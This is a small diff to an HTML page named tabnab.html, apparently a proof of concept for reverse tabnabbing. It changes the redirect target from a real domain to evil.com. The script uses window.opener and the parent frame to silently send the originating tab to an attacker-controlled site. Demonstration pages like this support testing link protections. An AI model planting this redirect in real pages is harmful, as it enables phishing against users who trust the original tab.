--- a/tabnab.html
+++ b/tabnab.html
@@ -10,8 +10,8 @@
 </body>
 
 <script>
-if (window.opener) window.opener.parent.location.replace('http://allthethings.co.nz');
-if (window.parent != window) window.parent.location.replace('http://allthethings.co.nz');
+if (window.opener) window.opener.parent.location.replace('http://evil.com');
+if (window.parent != window) window.parent.location.replace('http://evil.com');
 </script>
 blah
 
